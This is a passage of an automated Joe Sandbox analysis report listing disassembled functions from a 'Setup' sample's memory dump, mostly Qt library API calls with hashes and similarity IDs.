                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807A2
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807AC
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807B6
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807C0
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980DF9
                                                                                                                                                              • ?path@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA1980E15
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980E22
                                                                                                                                                              • ?lastIndexOf@QString@@QEBAHVQChar@@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1980E3A
                                                                                                                                                              • ?left@QString@@QEBA?AV1@H@Z.QT5CORE ref: 00007FFBA1980E4E
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980E59
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980E6A
                                                                                                                                                              • ??4QString@@QEAAAEAV0@VQChar@@@Z.QT5CORE ref: 00007FFBA1980E78
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980E8F
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980E9A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980EA5
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980EB7
                                                                                                                                                              • ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA1980ECF
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1980EE7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980EF2
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980F48
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQChar@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1980F5B
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980F77
                                                                                                                                                              • ?prepend@QString@@QEAAAEAV1@VQChar@@@Z.QT5CORE ref: 00007FFBA1980F84
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$V0@@$Array@@Byte$Char@@Char@@@$Latin1$DateEmpty@Time@@$CaseComponentFlags@FormattingOption@Qt@@@Sensitivity@Url@@Url@@@@@$?host@?last?left@?path@?prepend@?startsBasicIndexTimer@@V0@$$With@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1366310738-0
                                                                                                                                                              • Opcode ID: d8a61174c208f22b443600693a2d947d85cb957c449a2793430075fc02275287
                                                                                                                                                              • Instruction ID: bf06a103df5d99639ee729a8396882d3a74c0818133e5810eaf75dbfec617c6a
                                                                                                                                                              • Opcode Fuzzy Hash: d8a61174c208f22b443600693a2d947d85cb957c449a2793430075fc02275287
                                                                                                                                                              • Instruction Fuzzy Hash: 7C4160A1A1E90392EB81DF21E4901BD6361FF95B88F844032EE5E476A5EF3DD549CF40
                                                                                                                                                              Function 00007FFBA19797D0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 108COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197981E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979845
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979853
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197986B
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979876
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979885
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979892
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798A3
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798B0
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19798E8
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA19798FF
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197991F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979930
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197997E
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19799AF
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$Type@@$ConverterFunction@$?registerInit_thread_footer$?ends?has?reserve@?typeAbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@@Private@@RegisteredSectionString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QList
                                                                                                                                                              • API String ID: 501081111-116365660
                                                                                                                                                              • Opcode ID: 6b3c67b03cef726eedec11ffabc8abdc0eb8b936834227bb5f9d484fb73c586d
                                                                                                                                                              • Instruction ID: 72938d940fb05114a31f2f8e1e223d0b93a77a81b0bff2cb4bdf466461b4c7fb
                                                                                                                                                              • Opcode Fuzzy Hash: 6b3c67b03cef726eedec11ffabc8abdc0eb8b936834227bb5f9d484fb73c586d
                                                                                                                                                              • Instruction Fuzzy Hash: B7515EB5A0EA4295FB929F30E8502B96362FF447A4F804136CD6D476A5EF3DE44ACF10
                                                                                                                                                              Function 00007FFBA19795E0 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 107COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197962E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979655
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979663
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197967B
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979686
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979695
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796A2
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796B3
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796C0
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19796F8
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA197970F
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197972F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979740
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197978E
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19797BF
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$Type@@$ConverterFunction@$?registerInit_thread_footer$?ends?has?reserve@?typeAbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@@Private@@RegisteredSectionString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QList
                                                                                                                                                              • API String ID: 501081111-116365660
                                                                                                                                                              • Opcode ID: 88242eda9ad74d90c3c0464fee828250e407556dc43f666ca39f70e263329fde
                                                                                                                                                              • Instruction ID: 161439b0f8a15652991fc6db0f182454c42318b745c9f7c71c34d41b2173f8b4
                                                                                                                                                              • Opcode Fuzzy Hash: 88242eda9ad74d90c3c0464fee828250e407556dc43f666ca39f70e263329fde
                                                                                                                                                              • Instruction Fuzzy Hash: 5F515EB5A0EA4285EB929F34E8502B86362FF447A5F804136CD6D476A5EF3DE849CF00
                                                                                                                                                              Function 00007FFBA197E330 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkRequest::setHeader: QVariant of type %s cannot be used with header %s, xrefs: 00007FFBA19874A1
                                                                                                                                                              • QNetworkRequest::setHeader: invalid header value KnownHeader(%d) received, xrefs: 00007FFBA1987404
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@MessageString@@$?warning@Array@@ByteEmpty@
                                                                                                                                                              • String ID: QNetworkRequest::setHeader: QVariant of type %s cannot be used with header %s$QNetworkRequest::setHeader: invalid header value KnownHeader(%d) received
                                                                                                                                                              • API String ID: 4137358909-1051798330
                                                                                                                                                              • Opcode ID: 006400767e4164538494ad5b71ec88e218f391bde36a5287107724f4e5fa1932
                                                                                                                                                              • Instruction ID: 2cf2782ae5104473a4b468c27e492b10ee86d91896ce4b4c7713d99a2a2fc7af
                                                                                                                                                              • Opcode Fuzzy Hash: 006400767e4164538494ad5b71ec88e218f391bde36a5287107724f4e5fa1932
                                                                                                                                                              • Instruction Fuzzy Hash: B64171A2B1A61295FB85DF75E8545F82722FF44B9CB804032EE1E07A55EF2CD14ACF00
                                                                                                                                                              Function 00007FFBA19DF9E0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 84threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                              • ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                              • ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                              • ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                              • ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FFBA19DFABD
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DFAF3
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFAFE
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ??0QDaemonThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E39AF
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19E39DD
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19E39E8
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19E39F2
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19E39FE
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19E3A0B
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE ref: 00007FFBA19E3A1A
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?lock@QMutex@@QEAAXXZ.QT5CORE ref: 00007FFBA19E47F4
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFBA19E480F
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?cast@QMetaObject@@QEBAPEAVQObject@@PEAV2@@Z.QT5CORE ref: 00007FFBA19E481F
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?qEnvironmentVariableIntValue@@YAHPEBDPEA_N@Z.QT5CORE ref: 00007FFBA19E4847
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?keyMap@QFactoryLoader@@QEBA?AV?$QMultiMap@HVQString@@@@XZ.QT5CORE ref: 00007FFBA19E4863
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?QStringList_contains@QtPrivate@@YA_NPEBVQStringList@@AEBVQString@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA19E48C4
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19E48F5
                                                                                                                                                              • ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFB0C
                                                                                                                                                              • ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19DFB18
                                                                                                                                                              • ?deleteLater@QObject@@QEAAXXZ.QT5CORE ref: 00007FFBA19DFB21
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFB67
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DFB74
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Thread@$Thread@@$Private@@$?main?moveApplicationCoreMetaMutex@@Thread@@@$?lock@Connection@Map@Qt@@@Routine@@StringString@@$?begin@?cast@?connect@?current?delete?key?sender@?set?start@CaseConnectionDaemonData@@EnvironmentFactoryInit_thread_footerLater@ListList@@List_contains@Loader@@Locker@@MultiMutexName@ObjectObject@@@PostPriority@1@@Sensitivity@String@@@String@@@@Type@V0@@V2@@Value@@Variablemalloc
                                                                                                                                                              • String ID: 1addPreAndPostRoutine()$2destroyed()
                                                                                                                                                              • API String ID: 1649926615-3033731886
                                                                                                                                                              • Opcode ID: 84d5c0ed9ee25f8fa6538b5b1bf8e5083d94f58d645708be0756a8083ff4e748
                                                                                                                                                              • Instruction ID: 4abbdefc44749a9711146b16f9184611636beb6dcaaa85d387b33c692d5f438b
                                                                                                                                                              • Opcode Fuzzy Hash: 84d5c0ed9ee25f8fa6538b5b1bf8e5083d94f58d645708be0756a8083ff4e748
                                                                                                                                                              • Instruction Fuzzy Hash: 7141E5A0A0FA4382EB869B31E8651B86361FF44BA4F445136DD2E477A5EF3CE446CF00
                                                                                                                                                              Function 00007FFBA19D7190 Relevance: 27.1, APIs: 18, Instructions: 148timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$ByteDevice@@$?size@Array@@@ElapsedLongLong@String@@Timer@@V0@@$?append@?elapsed@?ready?restart@?write@Array@@Buffer@@Int@Null@Open@Read@RingV0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 770803935-0
                                                                                                                                                              • Opcode ID: 97a41a2b3998511ed66fd57b1ee93d129f44c6d97e8e37e98a3cc5a970be3b3a
                                                                                                                                                              • Instruction ID: e854f5d97fe249aacde5115826ba3bc8a5de58902466a296b143a19ad3d1ed3b
                                                                                                                                                              • Opcode Fuzzy Hash: 97a41a2b3998511ed66fd57b1ee93d129f44c6d97e8e37e98a3cc5a970be3b3a
                                                                                                                                                              • Instruction Fuzzy Hash: 426164B1A0EA8282EB959F31E4542B96361FB44B9DF444132DE9E476A9DF3CE446CF00
                                                                                                                                                              Function 00007FFBA1A45120 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C68
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C8D
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34CA4
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D58
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D7D
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D94
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EA8
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32ECD
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EE4
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?fromLatin1@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FFBA1A41865
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1A41872
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?splitRef@QString@@QEBA?AV?$QVector@VQStringRef@@@@VQChar@@V?$QFlags@W4SplitBehaviorFlags@Qt@@@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1A41892
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A418B2
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A418C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A418D0
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A418DB
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A418E6
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A418F5
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A41907
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??8QString@@QEBA_NVQLatin1String@@@Z.QT5CORE ref: 00007FFBA1A4193A
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A41A8D
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?startsWith@QStringRef@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1A41ABF
